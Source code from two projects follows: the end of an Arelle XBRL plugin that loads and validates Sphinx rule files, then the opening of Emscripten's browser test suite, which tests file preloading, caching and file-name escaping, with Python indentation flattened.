ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
import tkinter.messagebox
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=cntlr.parent)
return False
modelXbrl = cntlr.modelManager.modelXbrl
sphinxFiles = sphinxFilesDialog(cntlr)
if not sphinxFiles:
return False
def backgroundParseSphinxFiles():
try:
from .SphinxParser import parse
sphinxProgs = parse(cntlr, modelXbrl.log, sphinxFiles)
try:
modelXbrl.sphinxContext.sphinxProgs.update(sphinxProgs) # add to previously loaded progs
except AttributeError:
from .SphinxContext import SphinxContext
modelXbrl.sphinxContext = SphinxContext(sphinxProgs, modelXbrl) # first sphinxProgs for DTS
except Exception as ex:
cntlr.addToLog(
_("[exception] Sphinx Compiling Exception: %(error)s \n%(traceback)s") %
{"error": ex,
"exc_info": True,
"traceback": traceback.format_tb(sys.exc_info()[2])})
import threading
thread = threading.Thread(target=backgroundParseSphinxFiles)
thread.daemon = True
thread.start()
# Extend menu with an item for the savedts plugin
menu.add_command(label="Import Sphinx files...",
underline=0,
command=sphinxFileMenuCommand)
def sphinxToLBMenuEntender(cntlr, menu):
def sphinxToLBMenuCommand():
import os, sys, traceback
from .FormulaGenerator import generateFormulaLB
sphinxFiles = sphinxFilesDialog(cntlr)
if not sphinxFiles:
return False
generatedFormulasDir = generatedFormulasDirDialog(cntlr)
if not generatedFormulasDir:
return False
def backgroundSphinxGenerateFormula():
try:
generateFormulaLB(cntlr, sphinxFiles, generatedFormulasDir)
except Exception as ex:
cntlr.addToLog(
_("[exception] Sphinx Compiling Exception: %(error)s \n%(traceback)s") %
{"error": ex,
"exc_info": True,
"traceback": traceback.format_tb(sys.exc_info()[2])})
import threading
thread = threading.Thread(target=backgroundSphinxGenerateFormula)
thread.daemon = True
thread.start()
# Extend menu with an item for the savedts plugin
menu.add_command(label="Compile Sphinx to Formula",
underline=0,
command=sphinxToLBMenuCommand)
def sphinxToLBCommandLineOptionExtender(parser):
# extend command line options to import sphinx files into DTS for validation
parser.add_option("--import-sphinx",
action="store",
dest="sphinxFilesForValidation",
help=_("Import sphinx files to the DTS for validation. "
"Multiple file names are separated by a '|' character. "))
# extend command line options with a generate sphinx into formula linkbase option
parser.add_option("--generate-sphinx-formula-linkbase",
action="store",
dest="sphinxFilesForFormulaLinkbase",
help=_("Generate an XBRL formula linkbase from sphinx files. "
"Multiple file names are separated by a '|' character. "
"Files may be xrb archives, xsr source files, or directories of same. "))
parser.add_option("--generated-sphinx-formulas-directory",
action="store",
dest="generatedSphinxFormulasDirectory",
help=_("Generated XBRL formula linkbases directory. "
"(If absent, formula linkbases save in sphinx files directory.) "))
def sphinxToLBCommandLineUtilityRun(cntlr, options):
# extend XBRL-loaded run processing for this option
if getattr(options, "sphinxFilesForFormulaLinkbase", None):
from .FormulaGenerator import generateFormulaLB
generateFormulaLB(cntlr,
options.sphinxFilesForFormulaLinkbase.split("|"),
options.generatedSphinxFormulasDirectory)
def sphinxCommandLineLoader(cntlr, options, modelXbrl):
# DTS loaded, add in sphinx files if any
if getattr(options, "sphinxFilesForValidation", None):
from .SphinxParser import parse
from .SphinxContext import SphinxContext
sphinxProgs = parse(cntlr, modelXbrl.log, options.sphinxFilesForValidation.split('|'))
modelXbrl.sphinxContext = SphinxContext(sphinxProgs, modelXbrl)
def sphinxValidater(val):
if hasattr(val.modelXbrl, "sphinxContext"):
# sphinx is loaded, last step in validation
from .SphinxValidator import validate
validate(val.modelXbrl.log, val.modelXbrl.sphinxContext)
def sphinxTestcaseVariationReadMeFirstUris(modelTestcaseVariation):
xbrlElement = XmlUtil.descendant(modelTestcaseVariation, 'http://www.corefiling.com/sphinx-conformance-harness/2.0', "xbrl")
if xbrlElement is not None:
modelTestcaseVariation._readMeFirstUris.append(xbrlElement.textValue)
return True # found it
return False # not a sphinx test case variation
def sphinxTestcaseVariationExpectedResult(modelTestcaseVariation):
issueElement = XmlUtil.descendant(modelTestcaseVariation, 'http://www.corefiling.com/sphinx-conformance-harness/2.0', "issue")
if issueElement is not None:
return issueElement.get("errorCode")
return None # no issue or not a sphinx test case variation
def sphinxTestcasesStart(cntlr, options, testcasesModelXbrl):
if options and getattr(options, "sphinxFilesForValidation", None): # command line mode
testcasesModelXbrl.sphinxFilesList = options.sphinxFilesForValidation.split('|')
elif (cntlr.hasGui and
testcasesModelXbrl.modelDocument.xmlRootElement.qname.namespaceURI == 'http://www.corefiling.com/sphinx-conformance-harness/2.0' and
not hasattr(testcasesModelXbrl, "sphinxFilesList")):
testcasesModelXbrl.sphinxFilesList = sphinxFilesDialog(cntlr)
def sphinxTestcaseVariationXbrlLoaded(testcasesModelXbrl, instanceModelXbrl):
# variation has been loaded, may need sphinx rules loaded if interactive
try:
sphinxFilesList = testcasesModelXbrl.sphinxFilesList
# load sphinx
from .SphinxParser import parse
sphinxProgs = parse(testcasesModelXbrl.modelManager.cntlr, instanceModelXbrl.log, sphinxFilesList)
from .SphinxContext import SphinxContext
instanceModelXbrl.sphinxContext = SphinxContext(sphinxProgs, instanceModelXbrl) # first sphinxProgs for DTS
except AttributeError:
pass # no sphinx
def sphinxTestcaseVariationExpectedSeverity(modelTestcaseVariation):
issueElement = XmlUtil.descendant(modelTestcaseVariation, 'http://www.corefiling.com/sphinx-conformance-harness/2.0', "issue")
if issueElement is not None:
return issueElement.get("severity")
return None # no issue or not a sphinx test case variation
def sphinxDialogRssWatchFileChoices(dialog, frame, row, options, cntlr, openFileImage, openDatabaseImage):
from tkinter import PhotoImage, N, S, E, W
try:
from tkinter.ttk import Button
except ImportError:
from ttk import Button
from arelle.CntlrWinTooltip import ToolTip
from arelle.UiUtil import gridCell, label
# add sphinx formulas to RSS dialog
def chooseSphinxFiles():
sphinxFilesList = cntlr.uiFileDialog("open",
multiple=True, # expect multiple sphinx files
title=_("arelle - Select sphinx rules file"),
initialdir=cntlr.config.setdefault("rssWatchSphinxRulesFilesDir","."),
filetypes=[(_("Sphinx files .xsr"), "*.xsr"), (_("Sphinx archives .xrb"), "*.xrb")],
defaultextension=".xsr")
if sphinxFilesList:
dialog.options["rssWatchSphinxRulesFilesDir"] = os.path.dirname(sphinxFilesList[0])
sphinxFilesPipeSeparated = '|'.join(sphinxFilesList)
dialog.options["sphinxRulesFiles"] = sphinxFilesPipeSeparated
dialog.cellSphinxFiles.setValue(sphinxFilesPipeSeparated)
else: # deleted
dialog.options.pop("sphinxRulesFiles", "") # remove entry
label(frame, 1, row, "Sphinx rules:")
dialog.cellSphinxFiles = gridCell(frame,2, row, options.get("sphinxRulesFiles",""))
ToolTip(dialog.cellSphinxFiles, text=_("Select a sphinx rules (file(s) or archive(s)) to to evaluate each filing. "
"The results are recorded in the log file. "), wraplength=240)
chooseFormulaFileButton = Button(frame, image=openFileImage, width=12, command=chooseSphinxFiles)
chooseFormulaFileButton.grid(row=row, column=3, sticky=W)
def sphinxDialogRssWatchValidateChoices(dialog, frame, row, options, cntlr):
from arelle.UiUtil import checkbox
dialog.checkboxes += (
checkbox(frame, 2, row,
"Sphinx rules",
"validateSphinxRules"),
)
def sphinxRssWatchHasWatchAction(rssWatchOptions):
return rssWatchOptions.get("sphinxRulesFiles") and rssWatchOptions.get("validateSphinxRules")
def sphinxRssDoWatchAction(modelXbrl, rssWatchOptions):
sphinxFiles = rssWatchOptions.get("sphinxRulesFiles")
if sphinxFiles:
from .SphinxParser import parse
sphinxProgs = parse(modelXbrl.modelManager.cntlr, modelXbrl.log, sphinxFiles.split('|'))
from .SphinxContext import SphinxContext
modelXbrl.sphinxContext = SphinxContext(sphinxProgs, modelXbrl) # first sphinxProgs for DTS
# sphinx is loaded, last step in validation
from .SphinxValidator import validate
validate(modelXbrl.log, modelXbrl.sphinxContext)
# plugin changes to model object factor classes
from arelle.ModelTestcaseObject import ModelTestcaseVariation
sphinxModelObjectElementSubstitutionClasses = (
(qname("{http://www.corefiling.com/sphinx-conformance-harness/2.0}variation"), ModelTestcaseVariation),
)
__pluginInfo__ = {
'name': 'Sphinx 2.0 Processor',
'version': '0.9',
'description': "This plug-in provides a Sphinx 2.0 processor and a compiler (of a limited subset of Sphinx) into formula linkbase. ",
'license': 'Apache-2',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2013 Mark V Systems Limited, All rights reserved.',
# classes of mount points (required)
'ModelObjectFactory.ElementSubstitutionClasses': sphinxModelObjectElementSubstitutionClasses,
'CntlrWinMain.Menu.File.Open': sphinxFilesOpenMenuEntender,
'CntlrWinMain.Menu.Tools': sphinxToLBMenuEntender,
'CntlrCmdLine.Options': sphinxToLBCommandLineOptionExtender,
'CntlrCmdLine.Utility.Run': sphinxToLBCommandLineUtilityRun,
'CntlrCmdLine.Xbrl.Loaded': sphinxCommandLineLoader,
'Validate.Finally': sphinxValidater,
'Testcases.Start': sphinxTestcasesStart,
'TestcaseVariation.Xbrl.Loaded': sphinxTestcaseVariationXbrlLoaded,
'ModelTestcaseVariation.ReadMeFirstUris': sphinxTestcaseVariationReadMeFirstUris,
'ModelTestcaseVariation.ExpectedResult': sphinxTestcaseVariationExpectedResult,
'ModelTestcaseVariation.ExpectedSeverity': sphinxTestcaseVariationExpectedSeverity,
'DialogRssWatch.FileChoices': sphinxDialogRssWatchFileChoices,
'DialogRssWatch.ValidateChoices': sphinxDialogRssWatchValidateChoices,
'RssWatch.HasWatchAction': sphinxRssWatchHasWatchAction,
'RssWatch.DoWatchAction': sphinxRssDoWatchAction
}
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen
from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from common import read_file, requires_v8, also_with_minimal_runtime, EMRUN
from tools import shared
from tools import ports
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def also_with_wasmfs(f):
def metafunc(self, wasmfs, *args, **kwargs):
if wasmfs:
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
metafunc._parameterize = {'': (False,),
'wasmfs': (True,)}
return metafunc
def also_with_wasm2js(f):
assert callable(f)
def metafunc(self, with_wasm2js):
assert self.get_setting('WASM') is None
if with_wasm2js:
self.set_setting('WASM', 0)
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'wasm2js': (True,)}
return metafunc
def shell_with_script(shell_file, output_file, replacement):
shell = read_file(path_from_root('src', shell_file))
create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self, *args, **kwargs)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def also_with_threads(f):
def decorated(self, *args, **kwargs):
f(self)
if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
print('(threads)')
self.emcc_args += ['-pthread']
f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
if EMTEST_BROWSER != 'node':
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL']) # is the default anyhow
def test_sdl1_es6(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL', '-sEXPORT_ES6'])
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
create_file(cpp_file, r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with --save-dir for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'),
args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map'])
@also_with_wasmfs
def test_preload_file(self):
create_file('somefile.txt', 'load me right before running the code please')
create_file('.somefile.txt', 'load me right before running the code please')
create_file('some@file.txt', 'load me right before running the code please')
absolute_src_path = os.path.abspath('somefile.txt')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
# TODO: change this when wasmfs supports relative paths.
if self.get_setting('WASMFS'):
path = "/" + path
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath])
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
create_file(tricky_filename, 'load me right before running the code please')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')])
# TODO: WASMFS doesn't support the rest of this test yet. Exit early.
if self.get_setting('WASMFS'):
return
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path])
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
f = fopen("%s", "r");
assert(f != NULL);
fclose(f);
f = fopen("%s", "r");
assert(f == NULL);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*'])
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY)
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins'])
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
@parameterized({
'default': ([],),
'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],),
})
@requires_threads
def test_preload_file_with_manual_data_download(self, args):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args)
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
# Move .data file out of server root to ensure that getPreloadedPackage is actually used
os.mkdir('test')
shutil.move('manual_download_data.data', 'test/manual_download_data.data')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by
# correctly escaping the names.
def test_output_file_escaping(self):
self.set_setting('EXIT_RUNTIME')
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.abspath(d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
create_file(os.path.join(d, txt), 'load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
create_file(cpp, r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
abs_txt = os.path.join(abs_d, txt)
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.abspath(page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0')
@parameterized({
'0': (0,),
'1mb': (1 * 1024 * 1024,),
'100mb': (100 * 1024 * 1024,),
'150mb': (150 * 1024 * 1024,),
})
def test_preload_caching(self, extra_size):
self.set_setting('EXIT_RUNTIME')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
if is_chrome() and extra_size >= 100 * 1024 * 1024:
self.skipTest('chrome bug')
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-sALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_preload_caching_indexeddb_name(self):
self.set_setting('EXIT_RUNTIME')
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_multifile(self):
# a few files inside a directory
ensure_dir('subdirr/moar')
create_file('subdirr/data1.txt', '1214141516171819')
create_file('subdirr/moar/data2.txt', '3.14159265358979')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
assert(strcmp("3.14159265358979", buf) == 0);
return 0;
}
''')
# by individual files
self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt'])
# by directory, and remove files to make sure
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY)
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(Path('subdirr/data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
default_shell = read_file(path_from_root('src/shell.html'))
create_file('shell.html', default_shell.replace('var Module = {', '''
var Module = {
locateFile: function(path, prefix) {
if (path.endsWith(".wasm")) {
return prefix + path;
} else {
return "cdn/" + path;
}
},
'''))
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
return 0;
}
''')
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.data', Path('cdn/test.data'))
self.run_browser('test.html', '', '/report_result?exit:0')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
